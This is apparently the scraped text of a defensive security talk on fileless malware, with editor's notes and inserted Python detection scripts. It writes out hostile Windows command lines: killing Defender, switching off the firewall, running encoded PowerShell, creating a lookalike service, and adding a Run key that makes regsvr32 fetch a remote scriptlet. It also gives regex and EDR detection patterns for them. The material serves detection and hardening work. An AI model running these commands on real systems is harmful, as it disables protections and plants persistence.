Fileless Malware, Config
Mgmt & Logs Oh My!!
> The following presentation contains my thoughts, ideas
and opinions. They do not represent those of my
current or past employers.
> Any events, characters and companies depicted in the
course of this presentation are purely fictitious. Any
similarity to actual events, characters or companies
is merely coincidental.
> Do not use the tactics/techniques presented here for
evil.
WARNING…
Disclaimer
> What will you walk away from here with?
– This slide deck!
– Security awareness of Fileless Malware adversary
tactics/techniques and detection.
– Motivation to look at OS configurations (registry/services),
logs, and simulate adversaries to secure your part of the
world.
Security depends on US!
Together We Can Defend!
> Jesse Moore
– Threat Detection and Response Team @ UW Medicine.
– Certs are too many to list (look me up on LinkedIn)
> GIAC Certified Forensic Analyst, GIAC Penetration Tester
https://www.linkedin.com/in/jessefmoore/
Jessefmoore+DFIR@gmail.com
Security enabler, just someone wanting to assist with
security!
WHO Am I?
– Security awareness of some Fileless Malware Adversary Tactics/Techniques
– In Memory attacks
– Empire demo
– Phish with SET
– Abuse Windows features
– PTH Demo
– CIS-CAT (Configuration Assessment Tool) demo
> Awareness of defense approaches
– Logging
> PowerShell Script Block
> CMD line audit
> Sysmon v8 logging
> Registry Monitoring
– Motivation to secure your part of the world
> CIS Hardening URL
> US-Cert Advisory
> Logging Cheat Sheets
> References to Adversary tactics.
…
What is the Agenda?
What's that? ¯\_(ツ)_/¯
whoami
systeminfo
qwinsta
taskkill /f /im MsMpEng.exe
netsh advfirewall set currentprofile state off
netsh advfirewall set domainprofile state off
netsh advfirewall set allprofiles state off
powershell -nop -exec bypass -EncodedCommand "cABvAHcAZQByAHMAaABl"
sc.exe create "svvchost" binpath= "c:\temp\svvchost.exe"
sc.exe start svvchost
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "start" /d "regsvr32 /u /s /i:http://www.wingtiptoys.com/stext.sct scrobj.dll" /f
Reference: https://gallery.technet.microsoft.com/Azure-Security-Center-549aa7a4
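The commands on the slide above are exactly what command-line auditing records (Security Event ID 4688 with process command-line auditing enabled, or Sysmon Event ID 1). As an added example that is not from the deck or the Azure Security Center item it cites, the script below runs one detection per slide tactic over constructed records shaped like those commands and decodes the -EncodedCommand argument; the slide's base64 is cut short, so it decodes to only a prefix of "powershell".

```python
"""Command-line audit triage for the tactics on the "What's that?" slide.

Added example, not from the deck or the Azure Security Center item it cites.
Records mimic the CommandLine field of Security Event ID 4688 (with process
command-line auditing enabled) or Sysmon Event ID 1; all of them are
constructed, not real telemetry.
"""
import base64
import re

# Constructed sample records: (process name, command line).
SAMPLE_EVENTS = [
    ("whoami.exe", "whoami"),
    ("taskkill.exe", "taskkill /f /im MsMpEng.exe"),
    ("netsh.exe", "netsh advfirewall set allprofiles state off"),
    ("powershell.exe",
     'powershell -nop -exec bypass -EncodedCommand "cABvAHcAZQByAHMAaABl"'),
    ("sc.exe", 'sc.exe create "svvchost" binpath= "c:\\temp\\svvchost.exe"'),
    ("reg.exe",
     'reg add HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run /v "start" '
     '/d "regsvr32 /u /s /i:http://www.wingtiptoys.com/stext.sct scrobj.dll" /f'),
    ("notepad.exe", "notepad.exe C:\\Users\\alice\\notes.txt"),  # benign control
]

# One pattern per slide tactic. Only the encoded-PowerShell rule has a capture
# group: the base64 argument, which is decoded for the analyst.
RULES = {
    "defense-evasion/kill-defender":
        re.compile(r"\btaskkill\b.*\bMsMpEng\.exe", re.I),
    "defense-evasion/firewall-off":
        re.compile(r"\bnetsh\s+advfirewall\s+set\s+\w+\s+state\s+off\b", re.I),
    "execution/encoded-powershell":
        re.compile(r"\bpowershell\b.*\s-e(?:c|nc|ncodedcommand)?\s+[\"']?"
                   r"([A-Za-z0-9+/=]+)", re.I),
    "persistence/service-from-temp":
        re.compile(r"\bsc(?:\.exe)?\s+create\b.*binpath=\s*[\"']?[a-z]:\\temp\\",
                   re.I),
    "persistence/run-key-regsvr32-sct":
        re.compile(r"\breg(?:\.exe)?\s+add\b.*\\CurrentVersion\\Run\b"
                   r".*\bregsvr32\b.*\.sct\b.*\bscrobj\.dll", re.I),
}


def decode_encoded_command(b64: str) -> str:
    """-EncodedCommand carries base64 of UTF-16LE text. Missing padding is
    restored; a dangling trailing byte (the slide's value is truncated) is
    ignored rather than raising."""
    padded = b64 + "=" * (-len(b64) % 4)
    return base64.b64decode(padded).decode("utf-16-le", errors="ignore")


def triage(events):
    """Return one (tag, process, detail) tuple per rule that matches a record.
    detail is the decoded script for encoded PowerShell, else empty."""
    hits = []
    for proc, cmdline in events:
        for tag, rx in RULES.items():
            m = rx.search(cmdline)
            if not m:
                continue
            detail = ""
            if tag == "execution/encoded-powershell":
                detail = decode_encoded_command(m.group(1))
            hits.append((tag, proc, detail))
    return hits


if __name__ == "__main__":
    for tag, proc, detail in triage(SAMPLE_EVENTS):
        print(f"{tag:<36} {proc:<16} {detail}")
```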
> What is the biggest risk to an org?
– Taken together, phishing and pretexting represent 93% of
all social breaches in the study. Email was the most
common attack vector (96%)
…
Okay, let's talk stats
Verizon Data Breach Investigations Report
(DBIR)
Phish -> Creds -> OWA -> phish other users
Phish -> Creds -> OWA -> find systems the account
has access to
Phish -> Creds -> VPN -> workstation
Phish -> Creds -> System Access -> Mimikatz
Phish -> Creds -> System Access -> Empire
Phish -> Creds -> System Access -> Meterpreter
Phish -> Creds -> System Access -> BloodHound
https://www.cobaltstrike.com/downloads/csmanual311.pdf pg.12
Cobalt Strike: adversary simulation
software.
> Configuration Best Practices
Must be aware to be prepared.
Being prepared… What can I do?
Reference: https://learn.cisecurity.org/cis-cat-landing-page
CIS Control 9: Limitation and Control of Network Ports, Protocols, and
Services
CIS_Microsoft_Windows_10_Enterprise_Release_1607_Benchmark_v1.2
> Patch Software
– US-Cert Advisories: https://www.us-cert.gov/mailing-lists-and-feeds
Must be aware to be prepared.
Being Aware something is bad
What even looks bad? (Adversary Tactics)
http://www.nationalccdc.org/
Who has heard of Collegiate Cyber Defense
Competition (CCDC)?
My Techniques
https://www.youtube.com/watch?v=VytjV2kPwSg
TS session hijacking (hmm, I wonder?)
https://github.com/vysec/RedTips
What even looks bad? (Adversary Tactics)
Check with Community GitHubs and twitter
> https://blog.jpcert.or.jp/.s/2016/01/windows-commands-abused-by-attackers.html
…
JPCERT: Windows Commands Abused by
Attackers
Mitigation Detection please? ATT&CK has
them.
> system)
…
Enable PowerShell Script Block logging
…You know, like PowerSploit, Nishang modules, etc.
Turn On PowerShell Module Logging
> Atomic Red Team has some Adversary TTPs mapped to ATT&CK framework.
Check your defenses!
Bad stuff? Adversary tactic code? Atomic
Red Team
EvntTrcngForWin
C# Adversary tactic code?
https://countercept.com/blog/detecting-malicious-use-of-net-part-2/
https://www.sans.org/security-resources/posters/dfir/windows-forensic-analysis-170
SANS Forensic poster
https://digital-forensics.sans.org/media/Poster_Windows_Forensics_2018_WEB.pdf
SANS Forensics FREE Poster
https://www.sans.org/security-resources/posters/hunt-evil/165/download
SANS Hunt Evil: Lateral Movement
https://github.com/olafhartong/sysmon-modular
MSFT Sysmon Mapped to ATT&CK
Sysmon Turned On. Oh no.. (says
attacker)
Use BloodHound to visualize accounts that may lead to
sensitive stuff leaving your organization at Risk.
Token Stealing? Monitor who logs on where
& when?
Reference: Derivative Local Admin http://www.sixdub.net/?p=591
BloodHound Attack (weaknesses) Paths
> Invoke-NinjaCopy.ps1
– Copy the ntds.dit database along with the SYSTEM hive
– Detection: PowerShell v5 Script Block Logging
> DCSync (Empire)
– Detection: https://github.com/shellster/DCSYNCMonitor
> Compare HaveIBeenPwned NTLM hashes with
ntds.dit NTLM hashes
– Detection: https://jacksonvd.com/pwned-passwords-and-ntlm-hashes/
Get the hashes
What about Active Directory?
> Monitor the Registry!
– Disable Reversible Encryption
– Disable LM and NTLM
– Disable Credential Caching
– LSA Protection Against Connection of Third-Party Modules
– Disabling Wdigest
– Prevent the use of saved passwords
– Credential Guard (Win10 Enterprise/srvr2016)
– Protected Users Security Group (Windows Server 2012 R2)
– Prevent Getting Debug Privileges
> Disable SeDebugPrivilege. You can do it using a GPO (local or domain). Go to Computer Configuration ->
Windows Settings -> Security Settings -> Local Policies -> User Rights Assignment and enable the policy
Debug programs.
…
Mimikatz Detections
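An added example, not from the deck or from CIS-CAT: a checker for the registry-backed items in the list above (WDigest, LSA Protection, LM/NTLM level, credential caching, Credential Guard) run over a constructed reg export snippet. The key paths and value names are the real Windows locations; the accepted values and the sample export are my assumptions.

```python
"""Assess a registry export against the credential-hardening settings in the
"Monitor the Registry!" list. Added example, not from the deck or from CIS-CAT.

Key paths and value names are the real Windows locations; the accepted values
follow common hardening guidance and are assumptions, and the .reg text is a
constructed sample, not an export from a real host.
"""
import re

LSA = r"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa"
WDIGEST = r"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest"
WINLOGON = r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"

# (key, value name) -> (type, accepted values, which slide item it covers)
EXPECTED = {
    (WDIGEST, "UseLogonCredential"):
        ("dword", {0}, "Disabling WDigest: no plaintext creds kept in LSASS"),
    (LSA, "RunAsPPL"):
        ("dword", {1}, "LSA Protection: unsigned modules cannot load into LSASS"),
    (LSA, "LmCompatibilityLevel"):
        ("dword", {5}, "Disable LM and NTLM: send NTLMv2 only, refuse LM and NTLM"),
    (WINLOGON, "CachedLogonsCount"):
        ("sz", {"0"}, "Disable credential caching"),
    (LSA, "LsaCfgFlags"):
        ("dword", {1, 2}, "Credential Guard on (1 = with UEFI lock, 2 = without)"),
}

# Constructed sample in `reg export` (.reg) syntax. LsaCfgFlags is deliberately
# absent so the MISSING path is exercised.
SAMPLE_REG = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest]
"UseLogonCredential"=dword:00000001

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa]
"RunAsPPL"=dword:00000001
"LmCompatibilityLevel"=dword:00000003

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
"CachedLogonsCount"="10"
"""

_VALUE_RE = re.compile(r'^"([^"]+)"=(.*)$')


def parse_reg(text):
    """Parse .reg text into {(key, name): (type, value)}. Keys and value names
    are lower-cased because the registry is case-insensitive."""
    values, key = {}, None
    for raw_line in text.splitlines():
        line = raw_line.strip()
        if not line or line.startswith(";") or line.startswith("Windows Registry Editor"):
            continue
        if line.startswith("[") and line.endswith("]"):
            key = line[1:-1].lower()
            continue
        m = _VALUE_RE.match(line)
        if not m or key is None:
            continue
        name, data = m.group(1).lower(), m.group(2)
        if data.lower().startswith("dword:"):
            values[(key, name)] = ("dword", int(data[6:], 16))
        elif len(data) >= 2 and data.startswith('"') and data.endswith('"'):
            values[(key, name)] = ("sz", data[1:-1])
        else:
            values[(key, name)] = ("other", data)  # hex(...), binary, multi-sz
    return values


def assess(reg_text):
    """Return one finding per expected setting with status OK, WEAK or MISSING."""
    values = parse_reg(reg_text)
    findings = []
    for (key, name), (kind, accepted, why) in EXPECTED.items():
        found = values.get((key.lower(), name.lower()))
        if found is None:
            # Absent value: the OS default applies. For WDigest that depends on
            # the build (off since 8.1 / 2012 R2); for the others the default is
            # the weaker setting, so surface it for review either way.
            status, detail = "MISSING", "not set (OS default applies)"
        elif found[0] == kind and found[1] in accepted:
            status, detail = "OK", repr(found[1])
        else:
            status, detail = "WEAK", f"{found[1]!r} (want one of {sorted(accepted)})"
        findings.append({"name": name, "status": status, "detail": detail, "why": why})
    return findings


if __name__ == "__main__":
    for f in assess(SAMPLE_REG):
        print(f"{f['status']:<8} {f['name']:<22} {f['detail']:<34} {f['why']}")
```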
> Detect Cobalt Strike Beacon
– https://blog.jpcert.or.jp/2018/08/volatility-plugin-for-detecting-cobalt-strike-beacon.html
– SMB pipes from workstation to workstation
> Detect Meterpreter
– rundll32.exe process, Poker ports, network analysis
– EDRs: childproc_name:"rundll32.exe" AND digsig_result:"Unsigned" AND path:cwindows*
– https://github.com/countercept/memory-carving-scripts
…
Fileless Malware Detections
> DEMO
– Fileless Malware demo:
> Detect Empire in memory with PowerShell script
https://screencast-o-matic.com/u/vqZ/Find_FilelessMal
Empire & Get-InjectedThread to detect
Perform Memory (Empire) Attack &
Detection!
> DEMO
– Phish Attack (How bad can it be?)
> Kali SET Phishing:
https://screencast-o-matic.com/u/vqZ/Kali_SET_PhishingWebsite
SET (PHISH) Attack
Perform the PHISH attack!
> Windows
– Abusing Windows
> https://screencastomatic.com/u/vqZ/MulitRelayResponderSetup
– https://www.youtube.com/watch?v=rjRDsXp_MNk (10:36 minutes)
– https://screencast-o-matic.com/u/vqZ/BuildMacroExploitEmpire
– https://screencast-o-matic.com/u/vqZ/CrackHashResponder
> https://screencast-o-matic.com/u/vqZ/PTH-Detection
Need to Monitor systems to find evidence of activities…
What other attacks are there?
> DEMO
– Automatically find Secure configs
> CIS-CAT: Configuration Assessment Tool.
> https://screencast-o-matic.com/u/vqZ/CIS-CAT
Reference:
> https://learn.cisecurity.org/cis-cat-landing-page
Windows Config Benchmarks for Defense!
Perform OS Configuration Hardening!
…
Log-MD & Malware Archaeology for
Logs!!!
More Logs…. https://www.sans.org/summit-archives/file/summit-archive-1536351477.pdf
DevonK (Endgame) and Roberto
(SpectorOps)
Example of stuff in this GitHub
Who can help in the Community? Hunt
Scripts
https://github.com/johnfranolich/Hunting-Scripts
> Time
> Baseline (what is normal?)
> Outliers (Frequency analysis)
> Hunt behavior more than signatures
> Build out capabilities (identify/expose)
> Research… (understand attacks and build defense)
…
Look for Behavior
https://github.com/clong/DetectionLab
Detection Lab
> Kansa (modular)
https://github.com/davehull/Kansa
> GRR (Agent)
https://grr-doc.readthedocs.io/
> HELK (Analytics)
https://github.com/Cyb3rWard0g/HELK
…
Other BLUE Tools
– Best Practices
> Center for Internet Security https://www.cisecurity.org/cybersecurity-best-practices/ (disable services/ports not needed (LLMNR))
> Check what Logs you need on system
https://www.imfsecurity.com/compare/
> Enable PowerShell Script Block Logging (find Evil):
https://www.fireeye.com/blog/threat-research/2016/02/greater_visibilityt.html
> Monitor your Registry, WMI, cmdlines, API, exe
> Hunt More Behavior and some signatures
– Know Thy Enemy
> Mitre ATT&CK https://attack.mitre.org/wiki/ATT%26CK_Matrix
> Check Defenses with repo https://redcanary.com/atomic-red-team/
> Cobalt Strike Manual for TTPs:
https://www.cobaltstrike.com/downloads/csmanual311.pdf
Monitor your logs, Have Secure Configurations, Patch (Or
Place in a Secure Enclave) & Simulate Adversary Tactics
to obtain Detection mechanisms (behaviors)…
The End… until next time.
…
Yep that was a lot…

Adversary tactics config mgmt-&-logs-oh-my

  • 2. > Following presentation contains my thoughts, ideas and opinions. They do not represent those of my current or past employers. > Any events, characters and company depicted in the course of this presentation are purely fictitious. Any similarity to actual events, characters and company is merely coincidental. > Do not use these tactics/techniques presented for evil. WARNING… Disclaimer
  • 3. > What you will walk away from here with? – This slide deck! – Security awareness of Fileless Malware Adversary Tactics/Techniques and Detection. – Motivation to look at OS configurations (registry/services), logs, and simulate adversaries to secure your part of the world. Security depends on US! Together We Can Defend!
  • 4. > Jesse Moore – Threat Detection and Response Team @ UW Medicine. – Certs are to many to list (lookup me up on LinkedIn) > GIAC Certified Forensics Analysts, GIAC Penetration Tester https://www.linkedin.com/in/jessefmoore/ Jessefmoore+DFIR@gmail.com Security Enablers, Just someone wanting to assist with Security! WHO Am I?
  • 5. – Security awareness of some Fileless Malware Adversary Tactics/Techniques – In Memory attacks – Empire demo – Phish with SET – Abuse Windows features – PTH Demo – CIS-CAT (Configuration Assessment Tool) demo > Awareness of defense approaches – Logging > PowerShell Script Block > CMD line audit > Sysmonv8 logging > Registry Monitoring – Motivation to secure your part of the world > CIS Hardening URL > US-Cert Advisory > Logging Cheat Sheets > References to Adversary tactics. … What is the Agenda?
  • 6. What's that? ¯\_(ツ)_/¯ whoami systeminfo Qwinsta taskkill /f /im MsMpEng.exe netsh advfirewall set currentprofile state off netsh advfirewall set domainprofile state off netsh advfirewall set allprofiles state off powershell -nop -exec bypass -EncodedCommand "cABvAHcAZQByAHMAaABl" sc.exe create "svvchost" binpath= "c:\temp\svvchost.exe" sc.exe start svvchost reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "start" /d "regsvr32 /u /s /i:http://www.wingtiptoys.com/stext.sct scrobj.dll" /f Reference: https://gallery.technet.microsoft.com/Azure-Security-Center-549aa7a4
  • 7. > What is the biggest Risk to org? – Taken together, phishing and pretexting represent 93% of all social breaches in the study. Email was the most common attack vector (96%) … Okay, let's talk stats Verizon Data Breach Investigations Report (DBIR) Phish -> Creds -> OWA -> phish other users Phish -> Creds -> OWA -> Find Systems account has access Phish -> Creds -> VPN -> workstation Phish -> Creds -> System Access -> Mimikatz – Phish -> Creds -> System Access -> Empire Phish -> Creds -> System Access -> Meterpreter Phish -> Creds -> System Access -> BloodHound https://www.cobaltstrike.com/downloads/csmanual311.pdf
  • 9. > Configuration Best Practices Must be aware to be prepared. Being prepared… What can I do? Reference: https://learn.cisecurity.org/cis-cat-landing-page
  • 10. CIS Controls: 9 Limitation and Control of Network Ports, Protocols, and Services CIS_Microsoft_Windows_10_Enterprise_Release_1607_Benchmark_v1.2
  • 11. > Patch Software – US-Cert Advisories: https://www.us-cert.gov/mailing-lists-and-feeds Must be aware to be prepared. Being Aware something is bad
  • 12. What even looks bad? (Adversary Tactics)
  • 13. http://www.nationalccdc.org/ Who has heard of Collegiate Cyber Defense Competition (CCDC)?
  • 17. https://github.com/vysec/RedTips What even looks bad? (Adversary Tactics) Check with Community GitHubs and twitter
  • 19. Mitigation Detection please? ATT&CK has them.
  • 20. > system) … Enable PowerShell Script Block logging
  • 21. …You know like PowerSploit, Nishang modules, etc Turn On PowerShell Module Logging
  • 22. > Atomic Red Team has some Adversary TTPs mapped to ATT&CK framework. Check your defenses! Bad stuff? Adversary tactic code? Atomic RedTeam
  • 23. EvntTrcngForWin C# Adversary tactic code? https://countercept.com/blog/detecting-malicious-use-of-net-part-2/
  • 28. Sysmon Turned On. Oh no.. (says attacker)
  • 29. Use BloodHound to visualize accounts that may lead to sensitive stuff leaving your organization at Risk. Token Stealing? Monitor who logs on where & when? Reference: Derivative Local Admin http://www.sixdub.net/?p=591
  • 31. > Invoke-NinjaCopy.ps1 – Copy ntds.dit database along with SYSTEM hive – Detection: PowerShell v5 Script Block Logging > DCSync (Empire) – Detection: https://github.com/shellster/DCSYNCMonitor > Compare HaveIBeenPWND NTLM hashes with ntds.dit NTLM hashes – Detection: https://jacksonvd.com/pwned-passwords-and-ntlm-hashes/ Get the hashes What about Active Directory?
  • 32. > Monitor the Registry! – Disable Reversible Encryption – Disable LM and NTLM – Disable Credential Caching – LSA Protection Against Connection of Third-Party Modules – Disabling Wdigest – Prevent the use of saved passwords – Credential Guard (Win10 Enterprise/srvr2016) – Protected Users Security Group (Windows Server 2012 R2) – Prevent Getting Debug Privileges > disable SeDebugPrivilege. You can do it using GPO (local or domain one). Go to Computer Configuration -> Windows Settings -> Security Settings -> Local Policies -> User Rights Assignment and enable the policy Debug Program. … Mimikatz Detections
  • 33. > Detect Cobalt Strike Beacon – https://blog.jpcert.or.jp/2018/08/volatility-plugin-for-detecting-cobalt-strike-beacon.html – SMB pipes from workstation to workstations > Detect Meterpreter – rundll32.exe process, Poker ports, Network analysis – EDRs. Childproc_name:"rundll32.exe" AND digsig_result:"Unsigned" AND path:cwindows* – https://github.com/countercept/memory-carving-scripts … Fileless Malware Detections
  • 34. > DEMO – Fileless Malware demo: > Detect Empire in memory with PowerShell script https://screencast-o-matic.com/u/vqZ/Find_FilelessMal Empire & Get-InjectedThread to detect Perform Memory (Empire) Attack & Detection!
  • 35. > DEMO – Phish Attack (How bad can it be?) > Kali SET Phishing: https://screencast-o-matic.com/u/vqZ/Kali_SET_PhishingWebsite SET (PHISH) Attack Perform the PHISH attack!
  • 36. > Windows – Abusing Windows > https://screencastomatic.com/u/vqZ/MulitRelayResponderSetup – https://www.youtube.com/watch?v=rjRDsXp_MNk (10:36 minutes) – https://screencast-o-matic.com/u/vqZ/BuildMacroExploitEmpire – https://screencast-o-matic.com/u/vqZ/CrackHashResponder > https://screencast-o-matic.com/u/vqZ/PTH-Detection Need to Monitor systems to find evidence of activities… What other attacks are there?
  • 37. > DEMO – Automatically find Secure configs > CIS-CAT: Configuration Assessment Tool. > https://screencast-o-matic.com/u/vqZ/CIS-CAT Reference: > https://learn.cisecurity.org/cis-cat-landing-page Windows Config Benchmarks for Defense! Perform OS Configuration Hardening!
  • 38. … Log-MD & Malware & Archaeology for Logs!!!
  • 40. Example of stuff in this Github Who can help in the Community? Hunt Scripts https://github.com/johnfranolich/Hunting-Scripts
  • 41. > Time > Baseline (what is normal?) > Outliers (Frequency analysis) > Hunt behavior more than signatures > Build out capabilities (identify/expose) > Research… (understand attacks and build defense) … Look for Behavior
  • 43. > Kansa (modular) https://github.com/davehull/Kansa > GRR (Agent) https://grr-doc.readthedocs.io/ > HELK (Analytics) https://github.com/Cyb3rWard0g/HELK … Other BLUE Tools
  • 44. – Best Practices > Center for Internet Security https://www.cisecurity.org/cybersecurity-best-practices/ (disable services/ports not needed (LLMNR)) > Check what Logs you need on system https://www.imfsecurity.com/compare/ > Enable PowerShell Script Block Logging (find Evil): https://www.fireeye.com/blog/threat-research/2016/02/greater_visibilityt.html > Monitor your Registry, WMI, cmdlines, API, exe > Hunt More Behavior and some signatures – Know Thy Enemy > Mitre ATT&CK https://attack.mitre.org/wiki/ATT%26CK_Matrix > Check Defenses with repo https://redcanary.com/atomic-red-team/ > Cobalt Strike Manual for TTPs: https://www.cobaltstrike.com/downloads/csmanual311.pdf Monitor your logs, Have Secure Configurations, Patch (Or Place in a Secure Enclave) & Simulate Adversary Tactics to obtain Detection mechanisms (behaviors)… The End… until next time.
  • 45. … Yep that was a lot…

Editor's Notes

  1. Thank you for attending! We will provide this slide deck, so we may concentrate on this being more of a conversation among friends and peers. Kind of like a MeetUp. Hope this arms everyone with resources to detect and secure UW devices.
  2. https://www.cisecurity.org/ https://www.microsoft.com/en-us/msrc/technical-security-notifications https://www.us-cert.gov/mailing-lists-and-feeds https://www.malwarearchaeology.com/cheat-sheets Free Tools to Review/Monitor/Log: Sysmon, Audit logs cmd line auditing, PowerShell https://ics-cert.us-cert.gov/sites/default/files/recommended_practices/RP_Patch_Management_S508C.pdf
  3. In-memory – Empire, CobaltStrike, Meterpreter. Registry-resident – store bad scripts in registry locations such as Autoruns. Script-based – such as vbs, PowerShell, Python, etc. Living off the Land – abusing Windows features such as LLMNR, or CertUtil, Psexec, WMI, PowerShell, WMIC, and the .NET API ¯\_(ツ)_/¯ The steps that follow assume that the attacker has already compromised the machine… Now the attacker is moving to the installation and exploitation phase. Powershell -nop -exec bypass -Enc "powershell -command "& { iwr https://download.sysinternals.com/files/Sysmon.zip -OutFile c:\temp\svchost.exe }"" Sc = Now the attacker is going to try to establish persistence by creating a service based on the file that was downloaded (Beacon (Reverse Shell)). REG ADD: The intent is to simulate a download. To continue establishing persistence, the attacker can also add a registry entry to download a malicious program once the computer starts (Beacon again?). "Fileless" actually refers to the techniques attackers use to avoid dropping malicious executable files on disk, in order to evade detection. Reference: https://www.barkly.com/what-are-fileless-attack-techniques
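The command-line auditing the deck keeps coming back to (Sysmon Event ID 1, Security 4688 with command-line auditing) is what makes that slide-6 sequence visible. The following is an added example, not part of the deck: a small triage script run over constructed CommandLine records that flags the Defender kill, the firewall profiles being switched off, the encoded PowerShell (decoding the slide's own blob, which is cut short), the service created from a temp path with a one-letter lookalike of svchost, and the Run key that points regsvr32 at a remote .sct. Rule labels and the KNOWN_NAMES list are our own choices, not an ATT&CK mapping.

```python
"""Defender-side triage of the command lines on the 'What's that?' slide.

SAMPLE_LOG holds constructed CommandLine values of the kind Sysmon Event ID 1
or Security 4688 (with command-line auditing) would record; not from the deck.
"""
import base64
import re

SAMPLE_LOG = [  # constructed sample records
    "whoami",
    "taskkill /f /im MsMpEng.exe",
    "netsh advfirewall set allprofiles state off",
    'powershell -nop -exec bypass -EncodedCommand "cABvAHcAZQByAHMAaABl"',
    'sc.exe create "svvchost" binpath= "c:\\temp\\svvchost.exe"',
    'reg add HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run /v "start" '
    '/d "regsvr32 /u /s /i:http://www.wingtiptoys.com/stext.sct scrobj.dll" /f',
    "netsh advfirewall show allprofiles",  # benign query: must not fire
]

RULES = [  # (label, pattern); labels are our own names, not an ATT&CK mapping
    ("defender-engine-killed", re.compile(r"\btaskkill\b.*\bMsMpEng\.exe", re.I)),
    ("firewall-profile-off",
     re.compile(r"\bnetsh\s+advfirewall\s+set\s+\w+profiles?\s+state\s+off", re.I)),
    ("powershell-exec-bypass", re.compile(r"\bpowershell\b.*-exec\w*\s+bypass", re.I)),
    ("service-from-temp",
     re.compile(r"\bsc(?:\.exe)?\s+create\b.*binpath=\s*\"?[a-z]:\\temp\\", re.I)),
    ("run-key-regsvr32-remote-sct",
     re.compile(r"\breg\s+add\b.*\\Run\b.*regsvr32.*/i:https?://.*scrobj\.dll", re.I)),
]
# PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...).
ENCODED = re.compile(r"-(?:e|ec|en|enc|encoded|encodedcommand)\s+[\"']?([A-Za-z0-9+/=]+)", re.I)
KNOWN_NAMES = ("svchost", "lsass", "csrss", "winlogon", "services", "explorer")


def decode_encoded_command(cmdline):
    """Return the UTF-16LE text behind -EncodedCommand, or None if absent/undecodable."""
    m = ENCODED.search(cmdline)
    if not m:
        return None
    blob = m.group(1)
    try:
        raw = base64.b64decode(blob + "=" * (-len(blob) % 4))
    except ValueError:
        return None
    # The slide's blob is cut short (odd byte count); decode loosely so triage still sees it.
    return raw.decode("utf-16-le", errors="ignore")


def edit_distance(a, b):
    """Plain Levenshtein distance, enough to spot one-character lookalikes."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def lookalike_names(cmdline):
    """(name, legit) pairs for service/binary names one edit away from a Windows process name."""
    names = set(re.findall(r"([A-Za-z0-9_]+)\.exe\b", cmdline))
    names |= set(re.findall(r"\bcreate\s+\"?([A-Za-z0-9_]+)", cmdline, re.I))
    return sorted((n, k) for n in names for k in KNOWN_NAMES
                  if n.lower() != k and edit_distance(n.lower(), k) == 1)


def classify(cmdline):
    """Every rule label that fires for one command line."""
    hits = [label for label, rx in RULES if rx.search(cmdline)]
    if decode_encoded_command(cmdline) is not None:
        hits.append("powershell-encoded-command")
    if lookalike_names(cmdline):
        hits.append("lookalike-process-name")
    return hits


def scan(records):
    """Map each command line that fires at least one rule to its labels."""
    return {line: labels for line in records if (labels := classify(line))}


if __name__ == "__main__":
    for line, labels in scan(SAMPLE_LOG).items():
        print(labels, "<-", line)
```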
  4. Phish -> Creds -> System Access -> BloodHound to map attack path https://www.cobaltstrike.com/downloads/csmanual311.pdf Page 10 for image. Cobalt Strike has a GUI that conveys the credential snowball attack.
  5. What is CS? CS is adversary simulation software designed to execute targeted attacks and emulate the post-exploitation action of advanced threat actors. https://www.cobaltstrike.com/downloads/csmanual311.pdf page 6 If you learn nothing else from me other than to check the manual and the blog posts by Raphael, my time here is worth it. https://www.cobaltstrike.com/aggressor-script/index.html Aggressor Script is a scripting language for red team operations and adversary simulations inspired by scriptable IRC clients and bots https://github.com/bluscreenofjeff/AggressorScripts
  6. CIS-CATS installation: https://screencast-o-matic.com/watch/cFj6F7qjgf Logging: Sysmon, Audit logging, Registry Monitoring, PowerShell Script Block Logging, cmd line auditing (Log-MD and CIS has a list) OWASP 2017 has a requirement for logging now. Going a step further: Act like the adversary and create detections for Network attacks, Host attacks Living off the Land: DCOM, WMI, API, EXE attacks, Website attacks, AD attack
  7. Audit: Navigate to the UI Path articulated in the Remediation section and confirm it is set as prescribed. This group policy setting is backed by the following registry location: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient:EnableMulticast Remediation: To establish the recommended configuration via GP, set the following UI path to Enabled: Computer Configuration\Policies\Administrative Templates\Network\DNS Client\Turn off multicast name resolution Impact: In the event DNS is unavailable a system will be unable to request it from other systems on the same subnet. https://screencastomatic.com/u/vqZ/MulitRelayResponderSetup https://screencast-o-matic.com/u/vqZ/CrackHashResponder
  8. Patch Software (WSUS, SCCM, PowerShell, etc): https://ics-cert.us-cert.gov/advisories-by-vendor Not vulnerability or Risk management: https://www.us-cert.gov/sites/default/files/resources/ncats/RVA-Sample-Report.pdf Even Twitter works for latest and greatest tactics…. SubTee and the whole SpectorOps crew.
  9. useful for understanding security risk against known adversary behavior, for planning security improvements, and verifying defenses work as expected. Who has played or is going next year to any CCDC competitions? On the Blue Team?
  10. The mission of the Collegiate Cyber Defense Competition (CCDC) system is to provide institutions with an information assurance or computer security curriculum a controlled, competitive environment to assess their student's depth of understanding and operational competency in managing the challenges inherent in protecting a corporate network infrastructure and business information systems. CCDC Events are designed to: Build a meaningful mechanism by which institutions of higher education may evaluate their programs Provide an educational venue in which students are able to apply the theory and practical skills they have learned in their course work Foster a spirit of teamwork, ethical behavior, and effective communication both within and across teams Create interest and awareness among participating institutions and students
